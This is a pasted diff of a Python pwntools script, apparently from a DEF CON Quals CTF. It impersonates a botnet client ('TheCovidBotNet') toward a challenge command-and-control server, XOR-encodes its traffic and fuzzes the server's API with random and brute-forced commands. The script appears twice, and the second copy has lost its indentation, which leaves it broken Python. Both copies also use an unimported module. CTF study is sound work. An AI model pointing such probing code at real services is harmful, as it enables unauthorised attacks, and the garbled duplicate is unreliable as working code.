rwincey · August 7, 2020 19:40
diff --git a/mal_fuzz.py b/mal_fuzz.py
 from pwn import *
 import os
 import random
 import time
 from itertools import product

 #Identified ERROR messages
 #ERROR Client not registered.
 #ERROR Invalid API command.                                      #  if not real command or over 1000 len
 #ERROR Incorrect Format, should be %s %[^\r\n\r\n]s\r\n\r\n
 #ERROR Improper registration sequence.

 #python3 mal_fuzz.py SILENT=1


 port = 13097

 def enc(str_data):
 	enc_code = "DEFCON_QUALS_RTV"
 	enc_data = str_data
 	dec_str = ''
 	for i in range(0, len(enc_data)):
 	    enc_char = enc_code[i%len(enc_code)]
 	    val = ord(enc_char) ^ ord(enc_data[i])
 	    dec_str += chr(val)

 	return dec_str

 def send_cmd(api_cmd):

 	r = remote("research.threatsims.com", port)

 	reg_msg = "%s AAAAA" % api_cmd
 	enc_msg = enc(reg_msg)
 	enc_msg += "\x0d\x0a\x0d\x0a"


 	r.send(enc_msg)

 	try:
 		data = r.recv()
 	

 		str_data = data.decode('utf-8')[:-4]
 		#print(str_data)
 		dec_data = enc(str_data)
 		#print(dec_data)
 		if "Invalid API command" not in dec_data:
 			print("VALID COMMAND: %s" % api_cmd)

 	except:
 		pass
 	finally:
 		r.close()


 def reg_malware(mal_id, mal_fam):

 	r = remote("research.threatsims.com", port)

 	reg_msg = "REG %s" % mal_id
 	enc_msg = enc(reg_msg)
 	enc_msg += "\x0d\x0a\x0d\x0a"


 	r.send(enc_msg)

 	try:
 		data = r.recv()
 	

 		str_data = data.decode('utf-8')[:-4]
 		#print(str_data)
 		dec_data = enc(str_data)
 		print(dec_data)

 		#Send family
 		fam_msg = "FAMILY %s" % mal_fam
 		enc_msg = enc(fam_msg)
 		enc_msg += "\x0d\x0a\x0d\x0a"

 		r.send(enc_msg)
 	except:
 		pass
 	finally:
 		r.close()

 def beacon(mal_id, data):
 	r = remote("research.threatsims.com", port)

 	reg_msg = "PING %s" % mal_id
 	enc_msg = enc(reg_msg)
 	enc_msg += "\x0d\x0a\x0d\x0a"

 	r.send(enc_msg)

 	while True:

 		try:
 			data = r.recv()
 		except:
 			break

 		str_data = data.decode('utf-8')[:-4]
 		#print(str_data)
 		dec_data = enc(str_data)
 		print(dec_data)
 		cmd = dec_data.split(" ")[1]

 		if cmd == "id":
 			#resp = "uid=1000(user) gid=1000(user) groups=1000(user)"
 			resp = data
 		elif cmd == "uname":
 			#resp = "Linux ubuntu 4.15.0-112-generic #113~16.04.1-Ubuntu SMP"
 			resp = data
 		elif cmd == "uptime":
 			#resp = "19:26:11 up 4 days, 14:06,  1 user,  load average: 0.23, 0.16, 0.06"
 			resp += data
 		else:
 			break

 		#Send family
 		fam_msg = "DATA %s" % resp
 		enc_msg = enc(fam_msg)
 		enc_msg += "\x0d\x0a\x0d\x0a"

 		r.send(enc_msg)

 def fuzz_initial():

 	r = remote("research.threatsims.com", port)
 	num = random.randint(0,50000)
 	data = os.urandom(num)
 	data += "\x0d\x0a\x0d\x0a".encode('utf-8')
 	r.send(data)

 	try:

 		data = r.recv()
 		str_data = data.decode('utf-8')[:-4]
 		#print(str_data)
 		dec_data = enc(str_data)
 		print(dec_data)

 	except:
 		pass

 	r.close()

 def fuzz_id():

 	num = random.randint(0,50000)
 	data = os.urandom(num)

 	mal_id = "t2sI2azxacFrbx64tr5"
 	#mal_fam = "TheCovidBotNet"

 	reg_malware(mal_id, data)

 def fuzz_beacon():

 	num = random.randint(0,50000)
 	data = os.urandom(num)

 	mal_id = str(num)
 	mal_fam = "TheCovidBotNet"

 	reg_malware(mal_id, mal_fam)
 	beacon(mal_id, data)


 def product_loop(generator, ret_list):


 	for p in generator:
 		ascii_entry = ''.join(p)		
 		ret_list.append(ascii_entry)

 	return


 def gen_ascii_strs(max_len):

 	ascii_list = []
 	for l in range(3, max_len):
 		generator = product(string.ascii_uppercase, repeat=int(l))
 		product_loop(generator, ascii_list)

 	return ascii_list

 def fuzz_API(prev_stop=None):

 	start_fuzz = True
 	if prev_stop != None:
 		start_fuzz = False

 	ascii_list = gen_ascii_strs(6)
 	#print(ascii_list)
 	for val in ascii_list:

 		if start_fuzz == False and val != prev_stop:
 			continue
 		else:
 			start_fuzz = True

 		try:
 			send_cmd(val)
 		except:
 			print("Last Value: %s" % val)
 			break


 #GET works on server a well

 # Usual operation
 #mal_id = "t2sI2azxacFrbx64tr5"
 #mal_fam = "TheCovidBotNet"
 #reg_malware(mal_id, mal_fam)
 #beacon(mal_id)

 #Goto beacon mode
 #while True:

 	#fuzz_initial()
 	#fuzz_id()
 	#fuzz_beacon()
 fuzz_API("SOJ")
 	#input()
	from pwn import *
	import os
	import random
	import time
	from itertools import product

	#Identified ERROR messages
	#ERROR Client not registered.
	#ERROR Invalid API command. # if not real command or over 1000 len
	#ERROR Incorrect Format, should be %s %[^\r\n\r\n]s\r\n\r\n
	#ERROR Improper registration sequence.

	#python3 mal_fuzz.py SILENT=1


	port = 13097

	def enc(str_data):
	enc_code = "DEFCON_QUALS_RTV"
	enc_data = str_data
	dec_str = ''
	for i in range(0, len(enc_data)):
	enc_char = enc_code[i%len(enc_code)]
	val = ord(enc_char) ^ ord(enc_data[i])
	dec_str += chr(val)

	return dec_str

	def send_cmd(api_cmd):

	r = remote("research.threatsims.com", port)

	reg_msg = "%s AAAAA" % api_cmd
	enc_msg = enc(reg_msg)
	enc_msg += "\x0d\x0a\x0d\x0a"


	r.send(enc_msg)

	try:
	data = r.recv()


	str_data = data.decode('utf-8')[:-4]
	#print(str_data)
	dec_data = enc(str_data)
	#print(dec_data)
	if "Invalid API command" not in dec_data:
	print("VALID COMMAND: %s" % api_cmd)

	except:
	pass
	finally:
	r.close()


	def reg_malware(mal_id, mal_fam):

	r = remote("research.threatsims.com", port)

	reg_msg = "REG %s" % mal_id
	enc_msg = enc(reg_msg)
	enc_msg += "\x0d\x0a\x0d\x0a"


	r.send(enc_msg)

	try:
	data = r.recv()


	str_data = data.decode('utf-8')[:-4]
	#print(str_data)
	dec_data = enc(str_data)
	print(dec_data)

	#Send family
	fam_msg = "FAMILY %s" % mal_fam
	enc_msg = enc(fam_msg)
	enc_msg += "\x0d\x0a\x0d\x0a"

	r.send(enc_msg)
	except:
	pass
	finally:
	r.close()

	def beacon(mal_id, data):
	r = remote("research.threatsims.com", port)

	reg_msg = "PING %s" % mal_id
	enc_msg = enc(reg_msg)
	enc_msg += "\x0d\x0a\x0d\x0a"

	r.send(enc_msg)

	while True:

	try:
	data = r.recv()
	except:
	break

	str_data = data.decode('utf-8')[:-4]
	#print(str_data)
	dec_data = enc(str_data)
	print(dec_data)
	cmd = dec_data.split(" ")[1]

	if cmd == "id":
	#resp = "uid=1000(user) gid=1000(user) groups=1000(user)"
	resp = data
	elif cmd == "uname":
	#resp = "Linux ubuntu 4.15.0-112-generic #113~16.04.1-Ubuntu SMP"
	resp = data
	elif cmd == "uptime":
	#resp = "19:26:11 up 4 days, 14:06, 1 user, load average: 0.23, 0.16, 0.06"
	resp += data
	else:
	break

	#Send family
	fam_msg = "DATA %s" % resp
	enc_msg = enc(fam_msg)
	enc_msg += "\x0d\x0a\x0d\x0a"

	r.send(enc_msg)

	def fuzz_initial():

	r = remote("research.threatsims.com", port)
	num = random.randint(0,50000)
	data = os.urandom(num)
	data += "\x0d\x0a\x0d\x0a".encode('utf-8')
	r.send(data)

	try:

	data = r.recv()
	str_data = data.decode('utf-8')[:-4]
	#print(str_data)
	dec_data = enc(str_data)
	print(dec_data)

	except:
	pass

	r.close()

	def fuzz_id():

	num = random.randint(0,50000)
	data = os.urandom(num)

	mal_id = "t2sI2azxacFrbx64tr5"
	#mal_fam = "TheCovidBotNet"

	reg_malware(mal_id, data)

	def fuzz_beacon():

	num = random.randint(0,50000)
	data = os.urandom(num)

	mal_id = str(num)
	mal_fam = "TheCovidBotNet"

	reg_malware(mal_id, mal_fam)
	beacon(mal_id, data)


	def product_loop(generator, ret_list):


	for p in generator:
	ascii_entry = ''.join(p)
	ret_list.append(ascii_entry)

	return


	def gen_ascii_strs(max_len):

	ascii_list = []
	for l in range(3, max_len):
	generator = product(string.ascii_uppercase, repeat=int(l))
	product_loop(generator, ascii_list)

	return ascii_list

	def fuzz_API(prev_stop=None):

	start_fuzz = True
	if prev_stop != None:
	start_fuzz = False

	ascii_list = gen_ascii_strs(6)
	#print(ascii_list)
	for val in ascii_list:

	if start_fuzz == False and val != prev_stop:
	continue
	else:
	start_fuzz = True

	try:
	send_cmd(val)
	except:
	print("Last Value: %s" % val)
	break


	#GET works on server a well

	# Usual operation
	#mal_id = "t2sI2azxacFrbx64tr5"
	#mal_fam = "TheCovidBotNet"
	#reg_malware(mal_id, mal_fam)
	#beacon(mal_id)

	#Goto beacon mode
	#while True:

	#fuzz_initial()
	#fuzz_id()
	#fuzz_beacon()
	fuzz_API("SOJ")
	#input()